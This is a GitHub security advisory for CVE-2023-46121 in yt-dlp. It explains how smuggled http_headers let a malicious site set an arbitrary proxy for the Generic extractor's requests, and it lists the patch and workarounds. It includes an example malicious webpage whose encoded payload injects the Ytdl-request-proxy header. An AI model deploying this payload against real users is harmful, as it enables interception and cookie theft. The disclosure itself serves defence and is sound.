yt-dlp Generic Extractor MITM Vulnerability via Arbitrary Proxy Injection

Moderate severity • GitHub Reviewed • Published Nov 14, 2023 in yt-dlp/yt-dlp • Updated Nov 15, 2023

Package

yt-dlp (pip)

Affected versions

>= 2022.10.04, < 2023.11.14

Patched versions

2023.11.14

Description

Impact

The Generic Extractor in yt-dlp is vulnerable to an attacker setting an arbitrary proxy for a request to an arbitrary url, allowing the attacker to MITM the request made from yt-dlp's HTTP session. This could lead to cookie exfiltration in some cases.

To pass extra control data between extractors (such as headers like Referer), yt-dlp employs a concept of "url smuggling". This works by adding this extra data as json to the url fragment ("smuggling") that is then passed on to an extractor. The receiving extractor then "unsmuggles" the data from the input url. This functionality is intended to be internal only.
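The smuggling round trip described above can be sketched with the standard library alone. This is a simplified illustration, not yt-dlp's actual code: the function names `smuggle` and `unsmuggle` and the example urls are hypothetical, and only the `__youtubedl_smuggle` fragment key is taken from the example payload in this advisory.

```python
import json
from urllib.parse import parse_qs, urlencode

# Fragment key as it appears in the advisory's example payload
SMUGGLE_KEY = '__youtubedl_smuggle'


def smuggle(url, data):
    """Append `data` as URL-encoded JSON in the fragment of `url`."""
    return url + '#' + urlencode({SMUGGLE_KEY: json.dumps(data)})


def unsmuggle(smuggled_url, default=None):
    """Split a smuggled url back into (plain_url, data)."""
    if '#' + SMUGGLE_KEY not in smuggled_url:
        return smuggled_url, default
    url, _, fragment = smuggled_url.rpartition('#')
    data = json.loads(parse_qs(fragment)[SMUGGLE_KEY][0])
    return url, data


# Round trip with placeholder urls and a Referer header
smuggled = smuggle(
    'https://media.example/video',
    {'http_headers': {'Referer': 'https://site.example/'}},
)
plain_url, extra = unsmuggle(smuggled)
```

The receiving side in this sketch accepts whatever the fragment contains, which is why the mechanism is only safe while the smuggled url comes from trusted, internal code.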

Currently, the Generic extractor accepts an arbitrary dictionary of HTTP headers in a smuggled url and adds them to the initial request it makes to that url. This is useful when, for example, a url sent to the Generic extractor needs a Referer header sent with it.

Additionally, yt-dlp has internal headers to set a proxy for a request: Ytdl-request-proxy and Ytdl-socks-proxy. While these are deprecated, internally Ytdl-request-proxy is still used for --geo-verification-proxy.

However, a maliciously crafted site can include these smuggled options in a url, which the Generic extractor then extracts and redirects to itself. This allows a malicious website to set an arbitrary proxy for an arbitrary url that the Generic extractor will request.

This could allow for the following, among other things:

  • An attacker can MITM a request it asks yt-dlp to make to any website.
    • If a user has loaded cookies into yt-dlp for the target site, which are not marked as secure, they could be exfiltrated by the attacker.
    • Fortunately most sites are HTTPS and should be setting cookies as secure.
  • An attacker can set cookies for an arbitrary site.
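The cookie point in the list above depends on the Secure attribute: a cookie without it is attached to plain HTTP requests, which an attacker-controlled proxy can read. The sketch below illustrates this with Python's standard `http.cookiejar`, not with yt-dlp's own cookie handling; the `make_cookie` helper, the cookie names, and the `site.example` host are all hypothetical.

```python
from http.cookiejar import Cookie, CookieJar
from urllib.request import Request


def make_cookie(name, value, domain, secure):
    """Build a minimal session cookie for the given domain."""
    return Cookie(
        version=0, name=name, value=value,
        port=None, port_specified=False,
        domain=domain, domain_specified=True, domain_initial_dot=False,
        path='/', path_specified=True,
        secure=secure, expires=None, discard=True,
        comment=None, comment_url=None, rest={},
    )


jar = CookieJar()
jar.set_cookie(make_cookie('session', 'abc', 'site.example', secure=False))
jar.set_cookie(make_cookie('token', 'xyz', 'site.example', secure=True))

# Plain HTTP request: only the cookie without the Secure attribute is attached
http_request = Request('http://site.example/')
jar.add_cookie_header(http_request)
http_cookies = http_request.get_header('Cookie')

# HTTPS request: both cookies are attached
https_request = Request('https://site.example/')
jar.add_cookie_header(https_request)
https_cookies = https_request.get_header('Cookie')
```

In this sketch only `session` travels over the plaintext request, so that is the cookie a proxy in the middle could observe.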

An example malicious webpage:

<!DOCTYPE html>
<cinerama.embedPlayer('t','{{ target_site }}#__youtubedl_smuggle=%7B%22http_headers%22:%7B%22Ytdl-request-proxy%22:%22{{ proxy url }}%22%7D,%22fake%22:%22.smil/manifest%22%7D')

Where {{ target_site }} is the URL the Generic extractor will request and {{ proxy url }} is the proxy through which that request will be sent.
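To make the payload easier to read, the fragment from the example page can be percent-decoded and parsed as JSON. In this sketch the `{{ proxy url }}` placeholder is filled with a hypothetical value, `http://proxy.example:8080`; everything else in the fragment is copied from the example above.

```python
import json
from urllib.parse import unquote

# Fragment from the example page, with a hypothetical proxy address filled in
fragment = (
    '__youtubedl_smuggle=%7B%22http_headers%22:%7B%22Ytdl-request-proxy%22:'
    '%22http://proxy.example:8080%22%7D,%22fake%22:%22.smil/manifest%22%7D'
)

# Split off the key, percent-decode the value, and parse the JSON it contains
key, _, encoded_value = fragment.partition('=')
smuggled_data = json.loads(unquote(encoded_value))

# Header through which the attacker-chosen proxy reaches the request
proxy_header = smuggled_data['http_headers']['Ytdl-request-proxy']
```

The decoded dictionary carries an `http_headers` entry holding the internal `Ytdl-request-proxy` header, alongside a `fake` entry with the value `.smil/manifest`.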

Patches

  • We have removed the ability to smuggle http_headers to the Generic extractor, as well as other extractors that use the same pattern.
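The idea behind the fix can be pictured as discarding any `http_headers` entry from smuggled data before it influences a request. The following is only a sketch of that idea under stated assumptions, not the upstream patch: the helper name `drop_smuggled_headers` and the sample values are hypothetical.

```python
def drop_smuggled_headers(smuggled_data):
    """Return a copy of the smuggled data without the 'http_headers' entry."""
    return {
        key: value
        for key, value in (smuggled_data or {}).items()
        if key != 'http_headers'
    }


# Data shaped like the advisory's example payload, with a hypothetical proxy address
untrusted = {
    'http_headers': {'Ytdl-request-proxy': 'http://proxy.example:8080'},
    'fake': '.smil/manifest',
}
cleaned = drop_smuggled_headers(untrusted)
```

Dropping the whole entry, rather than filtering individual header names, means no header from an untrusted url can reach the request at all.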

Workarounds

  • Disable the Generic extractor (--ies default,-generic), or only pass trusted sites with trusted content.
  • Take caution when using --no-check-certificate.

References

@Grub4K Grub4K published to yt-dlp/yt-dlp Nov 14, 2023
Published by the National Vulnerability Database Nov 15, 2023
Published to the GitHub Advisory Database Nov 15, 2023
Reviewed Nov 15, 2023
Last updated Nov 15, 2023

Severity

Moderate

CVSS overall score

5.0 / 10

CVSS v3 base metrics

Attack vector: Network
Attack complexity: High
Privileges required: None
User interaction: Required
Scope: Unchanged
Confidentiality: Low
Integrity: Low
Availability: Low

CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L

EPSS score

0.072%
(33rd percentile)

CVE ID

CVE-2023-46121

GHSA ID

GHSA-3ch3-jhc6-5r8x
